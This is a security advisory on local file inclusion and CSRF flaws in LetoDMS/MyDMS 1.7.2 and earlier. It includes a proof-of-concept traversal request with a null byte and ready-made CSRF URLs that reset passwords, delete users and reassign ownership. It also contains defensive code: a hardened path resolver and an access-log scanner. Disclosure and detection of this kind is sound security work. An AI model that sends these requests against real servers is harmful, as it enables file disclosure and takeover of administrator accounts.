LetoDMS Local File Inclusion / Cross Site Request Forgery

Posted Jan 16, 2010
Authored by Daniel Fabian, Lukas Weichselbaum | Site sec-consult.com

LetoDMS versions 1.7.2 and below suffer from cross site request forgery and local file inclusion vulnerabilities.

tags | exploit, local, vulnerability, file inclusion, csrf
SHA-256 | c9b6e49cdbd9d24344a2e48a4b49a02dfc63f27df1f1c9790f6bea3a57ed26ab

SEC Consult Security Advisory < 20100115-0 >
========================================================================
title: Local file inclusion/execution and multiple
Cross-Site-Request-Forgery vulnerabilities in
LetoDMS (formerly MyDMS)
products: LetoDMS (formerly MyDMS)
vulnerable version: LetoDMS (formerly MyDMS) <= 1.7.2
fixed version: n.a.
impact: critical
homepage: http://sourceforge.net/projects/mydms/
found: 2009-10-09
by: D. Fabian / SEC Consult / www.sec-consult.com
L. Weichselbaum / SEC Consult / www.sec-consult.com
========================================================================

Vendor description:
-------------------
MyDMS is an open-source, web-based document management system (DMS)
written in PHP with a database backend. Originally coded by Markus
Westphal, MyDMS provides document meta-data, version control, security
and easy access to your documents.

source: http://sourceforge.net/projects/mydms/


Vulnerability overview/description:
-----------------------------------
The lang parameter of /mydms/op/op.Login.php is vulnerable to file
inclusion. Through this vulnerability it is possible to read sensitive
files from the web server and to execute malicious PHP code.

Furthermore, there are multiple Cross-Site-Request-Forgery
vulnerabilities which can be used to force a user or admin to execute
unwanted actions. Some of these actions are:
* Create new user with admin-privileges
* Change user credentials
* Delete a user/folder/document
* Change owner of a document
* Change access to a document
* Add keywords
* Add notifications
* Move folders


Proof of concept:
-----------------
File inclusion/execution
========================
If the guest account is activated, or an attacker has a user account to
log in with, it is possible to include or execute files: the lang
parameter can be modified in a malicious way. Because the application
appends a predefined file ending to the parameter, a null byte has to be
appended after the name of the file to be included so that the path is
terminated before that ending. The following GET request can be used,
for example, to retrieve the content of the boot.ini file on a server
running Windows. This vulnerability can also be used to execute
malicious PHP code (e.g. PHP code that has been written into log files).


PoC request

GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../
boot.ini%00&sesstheme= HTTP/1.1
[...]
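As an added illustration (not code from the advisory or from LetoDMS), the following Python models the flawed resolution described above beside a hardened one. The directory layout (<lang_dir>/<lang>/lang.inc) and the allowlist of shipped languages are assumptions; the truncation at the NUL byte mirrors what include() did in PHP releases before 5.3.4, which is why the appended ending never protected the path.

```python
import os
import re

# Language names the application is assumed to ship (constructed allowlist;
# the real directory listing of a LetoDMS install is not on this page).
KNOWN_LANGS = {"English", "German", "French"}

# Assumed layout: <lang_dir>/<lang>/lang.inc. The advisory only states that a
# predefined file ending is appended to the parameter.
LANG_SUFFIX = "/lang.inc"


def vulnerable_lang_path(lang_dir, lang):
    """Models the flawed resolution the advisory describes: the URL-decoded
    lang value is concatenated with a fixed ending, and a NUL byte inside the
    value cuts the path short (C-string semantics of include() in old PHP),
    so the ending is never reached. Kept only to show why it fails."""
    path = lang_dir + "/" + lang + LANG_SUFFIX
    return path.split("\x00", 1)[0]


def safe_lang_path(lang_dir, lang):
    """Hardened resolution: the value must be a plain word that is on the
    allowlist, and the canonical result must stay inside lang_dir."""
    if not re.fullmatch(r"[A-Za-z]{1,32}", lang) or lang not in KNOWN_LANGS:
        return None
    base = os.path.realpath(lang_dir)
    candidate = os.path.realpath(os.path.join(base, lang, "lang.inc"))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    payload = "../../../../boot.ini\x00"  # the PoC's %00, after URL decoding
    print(vulnerable_lang_path("/var/www/mydms/languages", payload))
    print(safe_lang_path("/var/www/mydms/languages", payload))
    print(safe_lang_path("/var/www/mydms/languages", "English"))
```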


Cross-Site-Request-Forgery (CSRF)
=================================
The following requests can be used for CSRF-attacks:

- (only POST) /mydms/op/op.EditUserData.php?pwd=0wned&pwdconf=0wned
&fullname=Administrator&email=address@server.com&comment=&userfile=
- /mydms/op/op.UsrMgr.php?userid=3&action=removeuser
- /mydms/out/out.RemoveVersion.php?documentid=1&version=1
- /mydms/op/op.RemoveFolder.php?folderid=2
- /mydms/op/op.DefaultKeywords.php?action=addcategory&name=test
- /mydms/op/op.GroupMgr.php?action=addgroup&name=test&comment=
- /mydms/op/op.FolderAccess.php?action=setowner&folderid=1&ownerid=3
- /mydms/op/op.FolderAccess.php?folderid=1&action=setdefault&mode=4
- /mydms/op/op.FolderAccess.php?folderid=1&action=addaccess&userid=3
&groupid=-1&mode=4
- /mydms/op/op.FolderNotify.php?folderid=1&action=addnotify&userid=3
&groupid=-1
- /mydms/op/op.MoveFolder.php?folderid=4&targetid=1

It is assumed that further functionality is vulnerable to CSRF attacks.
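Since no fix is available, an operator's practical option is to watch the web server log for the two patterns described above. The script below is an added example (not part of the advisory) that runs over constructed access-log lines in the common "combined" format: it flags lang values with traversal or a null byte on op.Login.php, and requests to the state-changing handlers listed above whose Referer is not the DMS's own host (dms.example and the client addresses are assumed values).

```python
import re
from urllib.parse import parse_qs, urlsplit

# State-changing LetoDMS handlers listed in the advisory.
STATE_CHANGING = {
    "/mydms/op/op.EditUserData.php", "/mydms/op/op.UsrMgr.php",
    "/mydms/out/out.RemoveVersion.php", "/mydms/op/op.RemoveFolder.php",
    "/mydms/op/op.DefaultKeywords.php", "/mydms/op/op.GroupMgr.php",
    "/mydms/op/op.FolderAccess.php", "/mydms/op/op.FolderNotify.php",
    "/mydms/op/op.MoveFolder.php",
}

# "combined" format: client ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$')

# Constructed sample lines: one LFI probe, one cross-site request to a
# state-changing handler, and two legitimate requests from a logged-in user.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Jan/2010:10:00:01 +0100] "GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../boot.ini%00&sesstheme= HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [15/Jan/2010:10:00:02 +0100] "GET /mydms/op/op.UsrMgr.php?userid=3&action=removeuser HTTP/1.1" 302 0 "http://other-site.example/page.html" "Mozilla/5.0"',
    '192.0.2.4 - - [15/Jan/2010:10:00:03 +0100] "GET /mydms/op/op.Login.php?login=alice&sesstheme=&lang=English HTTP/1.1" 302 0 "http://dms.example/mydms/out/out.Login.php" "Mozilla/5.0"',
    '192.0.2.4 - - [15/Jan/2010:10:00:04 +0100] "GET /mydms/op/op.MoveFolder.php?folderid=4&targetid=1 HTTP/1.1" 302 0 "http://dms.example/mydms/out/out.ViewFolder.php?folderid=4" "Mozilla/5.0"',
]

def analyse_line(line, own_host):
    """Return the findings for one access-log line (empty list if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed line"]
    client, method, target, status, referer = m.groups()
    url = urlsplit(target)
    # parse_qs URL-decodes, so %00 and %2e%2e%2f become the raw characters.
    query = parse_qs(url.query, keep_blank_values=True)
    findings = []
    if url.path == "/mydms/op/op.Login.php":
        for lang in query.get("lang", []):
            if "\x00" in lang or "../" in lang or "..\\" in lang:
                findings.append(f"LFI attempt from {client}: lang={lang!r} (status {status})")
    if url.path in STATE_CHANGING:
        # These versions carry no anti-CSRF token, so a foreign or missing Referer
        # is the best available signal; browsers may strip it, so it is a lead, not proof.
        ref_host = urlsplit(referer).hostname if referer and referer != "-" else None
        if ref_host != own_host:
            findings.append(f"possible CSRF from {client}: {method} {url.path} referer={referer}")
    return findings

def scan(lines, own_host):
    """Findings for a whole log, in order."""
    return [f for line in lines for f in analyse_line(line, own_host)]
```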


Vulnerable versions:
--------------------
MyDMS
* <= 1.7.2

Vendor contact timeline:
------------------------
2009-10-29: Contacting developers on SourceForge.Net and on
trilexnet.com by contact-form and the dev-forum.
2009-12-11: No response from developers so far.
2009-12-11: New attempt to contact developers.
2010-01-15: No response from developers.
2010-01-15: Release of the advisory.


Solution:
---------
n.a.

Advisory URL:
-------------
https://www.sec-consult.com/advisories.html#a64


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

SEC Consult conducts periodical information security workshops on ISO
27001/BS 7799 in cooperation with BSI Management Systems. For more
information, please refer to https://www.sec-consult.com/academy_e.html

EOF L. Weichselbaum / @2010